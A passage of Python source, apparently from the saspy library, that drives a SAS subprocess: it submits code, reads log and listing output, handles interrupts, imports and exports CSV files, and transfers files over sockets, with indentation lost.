msg = "SAS Connection failed. No connection established. Double check your settings in sascfg_personal.py file.\n"
msg += "Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n"
msg += "Try running the following command (where saspy is running) manually to see if you can get more information on what went wrong:\n"+s+"\n"
logger.error(msg)
return None
if self.sascfg.verbose:
pid = self.pid if os.name != 'nt' else self.pid.pid
logger.info("SAS Connection established. Subprocess id is "+str(pid)+"\n")
return self.pid
if os.name == 'nt':
def _read_out(self):
while True:
lst = self.pid.stdout.read(4096)
if lst == b'':
break
self.stdout.put(lst)
def _read_err(self):
while True:
log = self.pid.stderr.read(4096)
if log == b'':
break
self.stderr.put(log)
def _endsas(self):
rc = 0
ret = None
if self.pid:
code = b";*\';*\";*/;\n;quit;endsas;\n"
self._getlog(wait=1)
if self.pid:
out = self.stdin.write(code)
self.stdin.flush()
#self._asubmit(code,'text')
sleep(1)
if self.pid:
if os.name == 'nt':
pid = self.pid.pid
try:
rc = self.pid.wait(5)
except (subprocess.TimeoutExpired):
if self.sascfg.verbose:
logger.warning("SAS didn't shutdown w/in 5 seconds; killing it to be sure")
self.pid.kill()
self.to.join(5)
self.te.join(5)
else:
pid = self.pid
x = 5
while True:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
break
x = x - 1
if x < 1:
break
sleep(1)
if rc[0] != 0:
pass
else:
if self.sascfg.verbose:
logger.warning("SAS didn't shutdown w/in 5 seconds; killing it to be sure")
os.kill(self.pid, signal.SIGKILL)
if self.sascfg.verbose:
logger.info("SAS Connection terminated. Subprocess id was "+str(pid))
self.pid = None
self._sb.SASpid = None
return ret
def _getlog(self, wait=5, jobid=None):
logf = b''
quit = wait * 2
logn = self._logcnt(False)
code1 = "%put E3969440A681A24088859985"+logn+";\nE3969440A681A24088859985"+logn
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
return 'SAS process has terminated unexpectedly. Pid State= '+str(rc)
while True:
if os.name == 'nt':
try:
log = self.stderr.get_nowait()
except Empty:
log = b''
else:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
else:
quit -= 1
if quit < 0 or len(logf) > 0:
break
sleep(0.5)
x = logf.decode(self.sascfg.encoding, errors='replace').replace(code1, " ")
self._log += x
if x.count('ERROR:') > 0:
warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
self._sb.check_error_log = True
if self.pid == None:
self._sb.SASpid = None
return "No SAS process attached. SAS process has terminated unexpectedly."
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
return 'SAS process has terminated unexpectedly. Pid State= '+str(rc)
return x
def _getlst(self, wait=5, jobid=None):
lstf = b''
quit = wait * 2
eof = 0
bof = False
lenf = 0
while True:
if os.name == 'nt':
try:
lst = self.stdout.get_nowait()
except Empty:
lst = b''
else:
lst = self.stdout.read1(4096)
if len(lst) > 0:
lstf += lst
if ((not bof) and lst.count(b"<!DOCTYPE html>", 0, 20) > 0):
bof = True
else:
lenf = len(lstf)
if (lenf > 15):
eof = lstf.count(b"</html>", (lenf - 15), lenf)
if (eof > 0):
break
if not bof:
quit -= 1
if quit < 0:
break
sleep(0.5)
if self.pid == None:
self._sb.SASpid = None
return "No SAS process attached. SAS process has terminated unexpectedly."
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
return 'SAS process has terminated unexpectedly. Pid State= '+str(rc)
if eof:
return lstf.decode(errors='replace')
else:
return lstf.decode(self.sascfg.encoding, errors='replace')
def _getlsttxt(self, wait=5, jobid=None):
f2 = [None]
lstf = b''
quit = wait * 2
eof = 0
self._asubmit("data _null_;file print;put 'Tom was here';run;", "text")
while True:
if os.name == 'nt':
try:
lst = self.stdout.get_nowait()
except Empty:
lst = b''
else:
lst = self.stdout.read1(4096)
if len(lst) > 0:
lstf += lst
lenf = len(lstf)
eof = lstf.find(b"Tom was here", lenf - 25, lenf)
if (eof != -1):
final = lstf.partition(b"Tom was here")
f2 = final[0].decode(self.sascfg.encoding, errors='replace').rpartition(chr(12))
break
lst = f2[0]
if self.pid == None:
self._sb.SASpid = None
return "No SAS process attached. SAS process has terminated unexpectedly."
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
return 'SAS process has terminated unexpectedly. Pid State= '+str(rc)
return lst.replace(chr(12), '\n')
def _asubmit(self, code, results="html"):
# as this is an _ method, it's not really to be used. Of note is that if this is used and if what it submitted generates
# anything to the lst, then unless _getlst[txt] is called, then next submit will happen to get the lst this wrote, plus
# what it generates. If the two are not of the same type (html, text) it could be problematic, beyond not being what was
# expected in the first place. __flushlst__() used to be used, but was never needed. Adding this note and removing the
# unnecessary read in submit as this can't happen in the current code.
odsopen = b"ods listing close;ods "+self.sascfg.output.encode()+ \
b" (id=saspy_internal) file=stdout options(bitmap_mode='inline') device=svg style="+self._sb.HTML_Style.encode()+ \
b"; ods graphics on / outputfmt=png;\n"
odsclose = b"ods "+self.sascfg.output.encode()+b" (id=saspy_internal) close;ods listing;\n"
ods = True;
if results.upper() != "HTML":
ods = False
if (ods):
self.stdin.write(odsopen)
out = self.stdin.write(code.encode(self.sascfg.encoding)+b'\n')
if (ods):
self.stdin.write(odsclose)
self.stdin.flush()
return str(out)
def submit(self, code: str, results: str ="html", prompt: dict = None, **kwargs) -> dict:
'''
This method is used to submit any SAS code. It returns the Log and Listing as a python dictionary.
code - the SAS statements you want to execute
results - format of results, HTML is default, TEXT is the alternative
prompt - dict of names:flags to prompt for; create macro variables (used in submitted code), then keep or delete
The keys are the names of the macro variables and the boolean flag is to either hide what you type and delete
the macros, or show what you type and keep the macros (they will still be available later)
for example (what you type for pw will not be displayed, user and dsname will):
results = sas.submit(
"""
libname tera teradata server=teracop1 user=&user pw=&pw;
proc print data=tera.&dsname (obs=10); run;
""" ,
prompt = {'user': False, 'pw': True, 'dsname': False}
)
Returns - a Dict containing two keys:values, [LOG, LST]. LOG is text and LST is 'results' (HTML or TEXT)
NOTE: to view HTML results in the ipykernel, issue: from IPython.display import HTML and use HTML() instead of print()
i.e,: results = sas.submit("data a; x=1; run; proc print;run')
print(results['LOG'])
HTML(results['LST'])
'''
prompt = prompt if prompt is not None else {}
printto = kwargs.pop('undo', False)
odsopen = b"ods listing close;ods "+self.sascfg.output.encode()+ \
b" (id=saspy_internal) file=stdout options(bitmap_mode='inline') device=svg style="+self._sb.HTML_Style.encode()+ \
b"; ods graphics on / outputfmt=png;\n"
odsclose = b"ods "+self.sascfg.output.encode()+b" (id=saspy_internal) close;ods listing;\n"
ods = True;
mj = b";*\';*\";*/;"
lstf = b''
logf = b''
bail = False
eof = 5
bc = False
done = False
logn = self._logcnt()
#logcodei = "%put E3969440A681A24088859985" + logn + ";"
#logcodeo = b"\nE3969440A681A24088859985" + logn.encode()
logcodei = "%put %upcase(e3969440a681a24088859985" + logn + ");"
logcodeo = b"E3969440A681A24088859985" + logn.encode()
pcodei = ''
pcodeiv = ''
pcodeo = ''
undo = b'proc printto;run;\n' if printto else b''
if self.pid == None:
self._sb.SASpid = None
logger.error("No SAS process attached. SAS process has terminated unexpectedly.")
return dict(LOG="No SAS process attached. SAS process has terminated unexpectedly.", LST='')
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
return dict(LOG='SAS process has terminated unexpectedly. Pid State= '+str(rc), LST='')
# to cover the possibility of an _asubmit w/ lst output not read; no known cases now; used to be __flushlst__()
# removing this and adding comment in _asubmit to use _getlst[txt] so this will never be necessary; delete later
#while(len(self.stdout.read1(4096)) > 0):
# continue
if results.upper() != "HTML":
ods = False
if len(prompt):
pcodei += 'options nosource nonotes;\n'
pcodeo += 'options nosource nonotes;\n'
for key in prompt:
gotit = False
while not gotit:
var = self.sascfg._prompt('Please enter value for macro variable '+key+' ', pw=prompt[key])
if var is None:
raise RuntimeError("No value for prompted macro variable provided.")
if len(var) > 0:
gotit = True
else:
print("Sorry, didn't get a value for that variable.")
if prompt[key]:
pcodei += '%let '+key+'='+var+';\n'
pcodeo += '%symdel '+key+';\n'
else:
pcodeiv += '%let '+key+'='+var+';\n'
pcodei += 'options source notes;\n'
pcodeo += 'options source notes;\n'
if ods:
self.stdin.write(odsopen)
pgm = mj+b'\n'+pcodei.encode(self.sascfg.encoding)+pcodeiv.encode(self.sascfg.encoding)
pgm += code.encode(self.sascfg.encoding)+b'\n'+pcodeo.encode(self.sascfg.encoding)+b'\n'+mj
out = self.stdin.write(pgm)
if ods:
self.stdin.write(odsclose)
out = self.stdin.write(undo+logcodei.encode(self.sascfg.encoding)+b'\n')
self.stdin.flush()
bof = False
while not done:
try:
while True:
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
log = b''
try:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
self._log += logf.decode(self.sascfg.encoding, errors='replace')
except:
pass
self.pid = None
self._sb.SASpid = None
return dict(LOG='SAS process has terminated unexpectedly. Pid State= ' +
str(rc)+'\n'+logf.decode(self.sascfg.encoding, errors='replace'), LST='')
if bail:
eof -= 1
if eof < 0:
break
if os.name == 'nt':
try:
lst = self.stdout.get_nowait()
except Empty:
lst = b''
else:
lst = self.stdout.read1(4096)
if len(lst) > 0:
lstf += lst
if ods and not bof and lstf.count(b"<!DOCTYPE html>", 0, 20) > 0:
bof = True
else:
if os.name == 'nt':
try:
log = self.stderr.get_nowait()
except Empty:
log = b''
else:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
if not bail and bc:
self.stdin.write(undo+odsclose+logcodei.encode(self.sascfg.encoding)+b'\n')
self.stdin.flush()
bc = False
if not bail and logf.count(logcodeo) >= 1:
if ods:
lenf = len(lstf)
if lenf > 20 and bof:
if lstf.count(b"</html>", (lenf - 15), lenf):
bail = True
else:
bail = True
done = True
except (ConnectionResetError):
log = ''
if os.name == 'nt':
try:
log = self.stderr.get_nowait()
except Empty:
log = b''
else:
try:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
self._log += logf.decode(self.sascfg.encoding, errors='replace')
except:
pass
rc = 0
if os.name == 'nt':
try:
rc = self.pid.wait(0)
except:
pass
else:
rc = os.waitpid(self.pid, 0)
self.pid = None
self._sb.SASpid = None
log = logf.partition(logcodeo)[0]+b'\nConnection Reset: SAS process has terminated unexpectedly. Pid State= '+str(rc).encode()+b'\n'+logf
return dict(LOG=log.encode(), LST='')
except (KeyboardInterrupt, SystemExit):
if not self._sb.sascfg.prompt:
raise KeyboardInterrupt("Interupt handling is disabled due to prompting being disabled.")
print('Exception caught!')
ll = self._breakprompt(logcodeo)
if ll.get('ABORT', False):
return ll
logf += ll['LOG']
lstf += ll['LST']
bc = ll['BC']
if not bc:
print('Exception handled :)\n')
else:
print('Exception ignored, continuing to process...\n')
self.stdin.write(undo+odsclose+logcodei.encode(self.sascfg.encoding)+b'\n')
self.stdin.flush()
if ods:
try:
lstf = lstf.decode()
except UnicodeDecodeError:
try:
lstf = lstf.decode(self.sascfg.encoding)
except UnicodeDecodeError:
lstf = lstf.decode(errors='replace')
else:
lstf = lstf.decode(self.sascfg.encoding, errors='replace')
logf = logf.decode(self.sascfg.encoding, errors='replace').replace(chr(12), chr(10))
trip = lstf.rpartition("/*]]>*/")
if len(trip[1]) > 0 and len(trip[2]) < 200:
lstf = ''
self._log += logf
final = logf.partition(logcodei)
z = final[0].rpartition(chr(10))
prev = '%08d' % (self._log_cnt - 1)
zz = z[0].rpartition("E3969440A681A24088859985" + prev)
logd = zz[2].replace(mj.decode(self.sascfg.encoding), '').replace(chr(12), chr(10))
lstd = lstf.replace(chr(12), chr(10)).replace('<body class="c body">',
'<body class="l body">').replace("font-size: x-small;",
"font-size: normal;")
if logd.count('ERROR:') > 0:
warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
self._sb.check_error_log = True
self._sb._lastlog = logd
return dict(LOG=logd, LST=lstd)
def _breakprompt(self, eos):
found = False
logf = b''
lstf = b''
bc = False
if self.pid is None:
self._sb.SASpid = None
return dict(LOG="No SAS process attached. SAS process has terminated unexpectedly.", LST='', ABORT=True)
if self.sascfg.ssh:
response = self.sascfg._prompt(
"SAS attention handling not supported over ssh. Please enter (T) to terminate SAS or (C) to continue.")
while True:
if response is None or response.upper() == 'C':
return dict(LOG=b'', LST=b'', BC=True)
if response.upper() == 'T':
break
response = self.sascfg._prompt("Please enter (T) to terminate SAS or (C) to continue.")
if os.name == 'nt':
self.pid.kill()
else:
interrupt = signal.SIGINT
os.kill(self.pid, interrupt)
sleep(.25)
while True:
if os.name == 'nt':
try:
rc = self.pid.wait(0)
except:
pass
self.pid = None
self._sb.SASpid = None
return dict(LOG='SAS process has terminated unexpectedly. RC from wait was: '+str(rc), LST='',ABORT=True)
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
outrc = str(rc)
return dict(LOG='SAS process has terminated unexpectedly. Pid State= '+outrc, LST='',ABORT=True)
lst = self.stdout.read1(4096)
lstf += lst
if len(lst) > 0:
lsts = lst.rpartition(b'Select:')
if lsts[0] != b'' and lsts[1] != b'':
found = True
query = lsts[1] + lsts[2].rsplit(b'\n?')[0] + b'\n'
print('Processing interrupt\nAttn handler Query is\n\n' + query.decode(self.sascfg.encoding, errors='replace'))
response = None
while response is None:
response = self.sascfg._prompt("Please enter your Response: ")
self.stdin.write(response.encode(self.sascfg.encoding) + b'\n')
self.stdin.flush()
if (response == 'C' or response == 'c') and query.count("C. Cancel") >= 1:
bc = True
break
else:
lsts = lst.rpartition(b'Press')
if lsts[0] != b'' and lsts[1] != b'':
query = lsts[1] + lsts[2].rsplit(b'\n?')[0] + b'\n'
print('Secondary Query is:\n\n' + query.decode(self.sascfg.encoding, errors='replace'))
response = None
while response is None:
response = self.sascfg._prompt("Please enter your Response: ")
self.stdin.write(response.encode(self.sascfg.encoding) + b'\n')
self.stdin.flush()
if (response == 'N' or response == 'n') and query.count("N to continue") >= 1:
bc = True
break
else:
print("******************No 'Select' or 'Press' found. Here's what was found.")
found = True
print('Processing interrupt\nAttn handler Query is\n\n' + lst.decode(self.sascfg.encoding, errors='replace'))
response = None
while response is None:
response = self.sascfg._prompt("Please enter your Response: or N/A only if there are no choices: ")
self.stdin.write(response.encode(self.sascfg.encoding) + b'\n')
self.stdin.flush()
if response in ['N/A', '']:
break
found = True
bc = True
else:
log = self.stderr.read1(4096)
logf += log
self._log += log.decode(self.sascfg.encoding, errors='replace')
if log.count(eos) >= 1:
print("******************Found end of step. No interrupt processed")
found = True
if found:
break
sleep(.25)
lstr = lstf
logr = logf
return dict(LOG=logr, LST=lstr, BC=bc)
def _break(self, inlst=''):
found = False
lst = inlst
interupt = signal.SIGINT
os.kill(self.pid, interupt)
sleep(.25)
self._asubmit('','text')
while True:
if len(lst) > 0:
lsts = lst.rpartition('Select:')
if lsts[0] != '' and lsts[1] != '':
found = True
print('Processing interupt\nAttn handler Query is\n\n'+lsts[1]+lsts[2].rsplit('\n?')[0]+'\n')
opt = lsts[2].partition('Cancel Submitted Statements')
if opt[0] != '' and opt[1] != '':
response = opt[0].rpartition('.')[0].rpartition(' ')[2]
else:
opt = lsts[2].partition('Halt DATA')
if opt[0] != '' and opt[1] != '':
response = opt[0].rpartition('.')[0].rpartition(' ')[2]
else:
opt = lsts[2].partition('Cancel the dialog')
if opt[0] != '' and opt[1] != '':
response = opt[0].rpartition('.')[0].rpartition(' ')[2]
else:
print("Unknown 'Select' choices found: ")
response = ''
print("'Select' Response="+response+'\n')
self._asubmit(response+'\n','text')
else:
lsts = lst.rpartition('Press')
if lsts[0] != '' and lsts[1] != '':
print('Seconday Query is:\n\n'+lsts[1]+lsts[2].rsplit('\n?')[0]+'\n')
opt = lsts[2].partition(' to exit ')
if opt[0] != '' and opt[1] != '':
response = opt[0].rpartition(' ')[2]
else:
opt = lsts[2].partition('N to continue')
if opt[0] != '' and opt[1] != '':
response = 'Y'
else:
response = 'X'
print("'Press' Response="+response+'\n')
self._asubmit(response+'\n','text')
else:
#print("******************No 'Select' or 'Press' found in lst=")
pass
sleep(.25)
lst = self.stdout.read1(4096).decode(self.sascfg.encoding, errors='replace')
else:
log = self.stderr.read1(4096).decode(self.sascfg.encoding, errors='replace')
self._log += log
logn = self._logcnt(False)
if log.count("E3969440A681A24088859985"+logn+"\n") >= 1:
print("******************Found end of step. No interupt processed")
found = True
if found:
ll = self.submit("ods "+self.sascfg.output+" (id=saspy_internal) close;ods listing close;ods listing;libname work list;\n",'text')
break
sleep(.25)
lst = self.stdout.read1(4096).decode(self.sascfg.encoding, errors='replace')
return log
def saslog(self):
"""
this method is used to get the current, full contents of the SASLOG
"""
return self._log
def exist(self, table: str, libref: str ="") -> bool:
"""
table - the name of the SAS Data Set
libref - the libref for the Data Set, defaults to WORK, or USER if assigned
Returns True it the Data Set exists and False if it does not
"""
sd = table.strip().replace("'", "''")
code = 'data _null_; e = exist("'
if len(libref):
code += libref+"."
code += "'"+sd+"'n"+'"'+");\n"
code += 'v = exist("'
if len(libref):
code += libref+"."
code += "'"+sd+"'n"+'"'+", 'VIEW');\n if e or v then e = 1;\n"
code += "put 'TABLE_EXISTS=' e 'TAB_EXTEND=';run;"
ll = self.submit(code, "text")
exists = int(ll['LOG'].rpartition("TABLE_EXISTS=")[2].rpartition(" TAB_EXTEND=")[0])
return bool(exists)
def read_csv(self, file: str, table: str, libref: str ="", nosub: bool =False, opts: dict = None) -> '<SASdata object>':
"""
This method will import a csv file into a SAS Data Set and return the SASdata object referring to it.
file - eithe the OS filesystem path of the file, or HTTP://... for a url accessible file
table - the name of the SAS Data Set to create
libref - the libref for the SAS Data Set being created. Defaults to WORK, or USER if assigned
opts - a dictionary containing any of the following Proc Import options(datarow, delimiter, getnames, guessingrows)
"""
opts = opts if opts is not None else {}
code = "filename x "
if file.lower().startswith("http"):
code += "url "
code += "\""+file+"\";\n"
code += "proc import datafile=x out="
if len(libref):
code += libref+"."
code += "'"+table.strip().replace("'", "''")+"'n dbms=csv replace; "+self._sb._impopts(opts)+" run;"
if nosub:
print(code)
else:
ll = self.submit(code, "text")
def write_csv(self, file: str, table: str, libref: str ="", nosub: bool =False, dsopts: dict = None, opts: dict = None) -> 'The LOG showing the results of the step':
"""
This method will export a SAS Data Set to a file in CSV format.
file - the OS filesystem path of the file to be created (exported from the SAS Data Set)
table - the name of the SAS Data Set you want to export to a CSV file
libref - the libref for the SAS Data Set.
dsopts - a dictionary containing any of the following SAS data set options(where, drop, keep, obs, firstobs)
opts - a dictionary containing any of the following Proc Export options(delimiter, putnames)
"""
dsopts = dsopts if dsopts is not None else {}
opts = opts if opts is not None else {}
code = "filename x \""+file+"\";\n"
code += "options nosource;\n"
code += "proc export data="
if len(libref):
code += libref+"."
code += "'"+table.strip().replace("'", "''")+"'n "+self._sb._dsopts(dsopts)+" outfile=x dbms=csv replace;\n"
code += self._sb._expopts(opts)+" run;\n"
code += "options source;\n"
if nosub:
print(code)
else:
ll = self.submit(code, "text")
return ll['LOG']
def upload_slow(self, localfile: str, remotefile: str, overwrite: bool = True, permission: str = '', **kwargs):
"""
This method uploads a local file to the SAS servers file system.
localfile - path to the local file to upload
remotefile - path to remote file to create or overwrite
overwrite - overwrite the output file if it exists?
permission - permissions to set on the new file. See SAS Filename Statement Doc for syntax
"""
valid = self._sb.file_info(remotefile, quiet = True)
if valid is None:
remf = remotefile
else:
if valid == {}:
remf = remotefile + self._sb.hostsep + localfile.rpartition(os.sep)[2]
else:
remf = remotefile
if overwrite == False:
return {'Success' : False,
'LOG' : "File "+str(remotefile)+" exists and overwrite was set to False. Upload was stopped."}
try:
fd = open(localfile, 'rb')
except OSError as e:
return {'Success' : False,
'LOG' : "File "+str(localfile)+" could not be opened. Error was: "+str(e)}
code = """
filename saspydir '"""+remf+"""' recfm=F encoding=binary lrecl=1 permission='"""+permission+"""';
data _null_;
file saspydir;
infile datalines;
input;
lin = length(_infile_);
outdata = inputc(_infile_, '$hex.', lin);
lout = lin/2;
put outdata $varying80. lout;
datalines4;"""
buf = fd.read1(40)
if len(buf):
self._asubmit(code, "text")
else:
code = """
filename saspydir '"""+remf+"""' recfm=F encoding=binary lrecl=1 permission='"""+permission+"""';
data _null_;
fid = fopen('saspydir', 'O');
if fid then
rc = fclose(fid);
run;\n"""
ll = self.submit(code, 'text')
fd.close()
return {'Success' : True,
'LOG' : ll['LOG']}
while len(buf):
buf2 = ''
for i in range(len(buf)):
buf2 += '%02x' % buf[i]
self.stdin.write(buf2.encode()+b'\n')
buf = fd.read1(40)
self._asubmit(";;;;", "text")
ll = self.submit("run;\nfilename saspydir;", 'text')
fd.close()
return {'Success' : True,
'LOG' : ll['LOG']}
def upload(self, localfile: str, remotefile: str, overwrite: bool = True, permission: str = '', **kwargs):
"""
This method uploads a local file to the SAS servers file system.
localfile - path to the local file to upload
remotefile - path to remote file to create or overwrite
overwrite - overwrite the output file if it exists?
permission - permissions to set on the new file. See SAS Filename Statement Doc for syntax
"""
valid = self._sb.file_info(remotefile, quiet = True)
if valid is None:
remf = remotefile
else:
if valid == {}:
remf = remotefile + self._sb.hostsep + localfile.rpartition(os.sep)[2]
else:
remf = remotefile
if overwrite == False:
return {'Success' : False,
'LOG' : "File "+str(remotefile)+" exists and overwrite was set to False. Upload was stopped."}
port = kwargs.get('port', 0)
if self.sascfg.ssh and self.sascfg.rtunnel and port == 0:
# we are using a rtunnel; default to that port
port = self.sascfg.rtunnel
host = 'localhost'
else:
return self._upload_client(localfile, remotefile, overwrite, permission, **kwargs)
try:
fd = open(localfile, 'rb')
except OSError as e:
return {'Success' : False,
'LOG' : "File "+str(localfile)+" could not be opened. Error was: "+str(e)}
code = """
filename saspydir '"""+remf+"""' recfm=F encoding=binary lrecl=1 permission='"""+permission+"""';
filename sock socket ':"""+str(port)+"""' server reconn=0 recfm=S lrecl=4096;
data _null_; nb = -1;
infile sock nbyte=nb;
file saspydir;
input;
put _infile_;
run;
filename saspydir;
filename sock;\n"""
self._asubmit(code, "text")
sock = socks.socket()
sock.connect((host, port))
done = False
while not done:
try:
while True:
buf = fd.read1(4096)
sent = 0
send = len(buf)
blen = send
if blen:
while send:
try:
sent = 0
sent = sock.send(buf[blen-send:blen])
except (BlockingIOError):
pass
except (OSError):
sock.close()
fd.close()
sock = socks.socket()
sock.connect((host, port))
fd = open(localfile, 'rb')
sleep(.5)
break
send -= sent
else:
done = True
sock.shutdown(socks.SHUT_RDWR)
sock.close()
fd.close()
break
except (KeyboardInterrupt, Exception) as e:
sock.close()
fd.close()
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Download was interupted. Returning the SAS log:\n\n"+str(e)+"\n\n"+ll['LOG']}
ll = self.submit("", 'text')
return {'Success' : True,
'LOG' : ll['LOG']}
def _upload_client(self, localfile: str, remotefile: str, overwrite: bool = True, permission: str = '', **kwargs):
"""
This method uploads a local file to the SAS servers file system.
localfile - path to the local file to upload
remotefile - path to remote file to create or overwrite
overwrite - overwrite the output file if it exists?
permission - permissions to set on the new file. See SAS Filename Statement Doc for syntax
"""
valid = self._sb.file_info(remotefile, quiet = True)
if valid is None:
remf = remotefile
else:
if valid == {}:
remf = remotefile + self._sb.hostsep + localfile.rpartition(os.sep)[2]
else:
remf = remotefile
if overwrite == False:
return {'Success' : False,
'LOG' : "File "+str(remotefile)+" exists and overwrite was set to False. Upload was stopped."}
port = kwargs.get('port', 0)
if port==0 and self.sascfg.tunnel:
# we are using a tunnel; default to that port
port = self.sascfg.tunnel
if self.sascfg.ssh:
if not self.sascfg.tunnel:
host = self.sascfg.hostip #socks.gethostname()
else:
host = 'localhost'
else:
host = ''
try:
fd = open(localfile, 'rb')
except OSError as e:
return {'Success' : False,
'LOG' : "File "+str(localfile)+" could not be opened. Error was: "+str(e)}
try:
sock = socks.socket()
if self.sascfg.tunnel:
sock.bind(('localhost', port))
else:
sock.bind(('', port))
port = sock.getsockname()[1]
except OSError:
return {'Success' : False,
'LOG' : "Error try to open a socket in the upload method. Call failed."}
code = """
filename saspydir '"""+remf+"""' recfm=F encoding=binary lrecl=1 permission='"""+permission+"""';
filename sock socket '"""+host+""":"""+str(port)+"""' recfm=S lrecl=4096;
/* filename sock socket '"""+host+""":"""+str(port)+"""' recfm=S encoding=binary lrecl=4096; */
data _null_; nb = -1;
infile sock nbyte=nb;
file saspydir;
input;
put _infile_;
run;
filename saspydir;
filename sock;\n"""
sock.listen(1)
self._asubmit(code, 'text')
if sel.select([sock],[],[],10)[0] == []:
logger.error("error occured in SAS during upload. Check the returned LOG for issues.")
sock.close()
fd.close()
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Failure in upload.\n"+ll['LOG']}
newsock = (0,0)
try:
newsock = sock.accept()
while True:
buf = fd.read1(4096)
sent = 0
send = len(buf)
blen = send
if blen:
while send:
try:
sent = 0
sent = newsock[0].send(buf[blen-send:blen])
except (BlockingIOError):
pass
send -= sent
else:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
sock.close()
fd.close()
break
except (KeyboardInterrupt, Exception) as e:
try:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
fd.close()
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Download was interupted. Returning the SAS log:\n\n"+str(e)+"\n\n"+ll['LOG']}
ll = self.submit("", 'text')
return {'Success' : True,
'LOG' : ll['LOG']}
def download(self, localfile: str, remotefile: str, overwrite: bool = True, **kwargs):
"""
This method downloads a remote file from the SAS servers file system.
localfile - path to the local file to create or overwrite
remotefile - path to remote file tp dpwnload
overwrite - overwrite the output file if it exists?
"""
valid = self._sb.file_info(remotefile, quiet = True)
if valid is None:
return {'Success' : False,
'LOG' : "File "+str(remotefile)+" does not exist."}
if valid == {}:
return {'Success' : False,
'LOG' : "File "+str(remotefile)+" is a directory."}
if os.path.isdir(localfile):
locf = localfile + os.sep + remotefile.rpartition(self._sb.hostsep)[2]
else:
locf = localfile
try:
fd = open(locf, 'wb')
except OSError as e:
return {'Success' : False,
'LOG' : "File "+str(locf)+" could not be opened. Error was: "+str(e)}
port = kwargs.get('port', 0)
if port==0 and self.sascfg.tunnel:
# we are using a tunnel; default to that port
port = self.sascfg.tunnel
try:
sock = socks.socket()
if self.sascfg.tunnel:
sock.bind(('localhost', port))
else:
sock.bind(('', port))
port = sock.getsockname()[1]
except OSError:
return {'Success' : False,
'LOG' : "Error try to open a socket in the download method. Call failed."}
if self.sascfg.ssh:
if not self.sascfg.tunnel:
host = self.sascfg.hostip #socks.gethostname()
else:
host = 'localhost'
else:
host = ''
code = """
filename saspydir '"""+remotefile+"""' recfm=F encoding=binary lrecl=4096;
filename sock socket '"""+host+""":"""+str(port)+"""' recfm=S lrecl=4096;
/* filename sock socket '"""+host+""":"""+str(port)+"""' recfm=S encoding=binary; */
data _null_;
file sock;
infile saspydir;
input;
put _infile_;
run;\n"""
sock.listen(1)
self._asubmit(code, 'text')
if sel.select([sock],[],[],10)[0] == []:
logger.error("error occured in SAS during download. Check the returned LOG for issues.")
sock.close()
fd.close()
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Failure in download.\n"+ll['LOG']}
datar = b''
newsock = (0,0)
try:
newsock = sock.accept()
while True:
data = newsock[0].recv(4096)
if len(data):
datar += data
else:
if len(datar):
fd.write(datar)
break
if len(datar) > 8300:
fd.write(datar[:8192])
datar = datar[8192:]
except (KeyboardInterrupt, Exception) as e:
try:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
fd.close()
ll = self.submit("filename saspydir;", 'text')
return {'Success' : False,
'LOG' : "Download was interupted. Returning the SAS log:\n\n"+str(e)+"\n\n"+ll['LOG']}
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
sock.close()
fd.flush()
fd.close()
ll = self.submit("filename saspydir;", 'text')
return {'Success' : True,
'LOG' : ll['LOG']}
def _getbytelenF(self, x):
return len(x.encode(self.sascfg.encoding))
def _getbytelenR(self, x):
return len(x.encode(self.sascfg.encoding, errors='replace'))
def dataframe2sasdata(self, df: '<Pandas Data Frame object>', table: str ='a',
libref: str ="", keep_outer_quotes: bool=False,
embedded_newlines: bool=True,
LF: str = '\x01', CR: str = '\x02',
colsep: str = '\x03', colrep: str = ' ',
datetimes: dict={}, outfmts: dict={}, labels: dict={},
outdsopts: dict={}, encode_errors = None, char_lengths = None,
**kwargs):
"""
This method imports a Pandas Data Frame to a SAS Data Set, returning the SASdata object for the new Data Set.
df - Pandas Data Frame to import to a SAS Data Set
table - the name of the SAS Data Set to create
libref - the libref for the SAS Data Set being created. Defaults to WORK, or USER if assigned
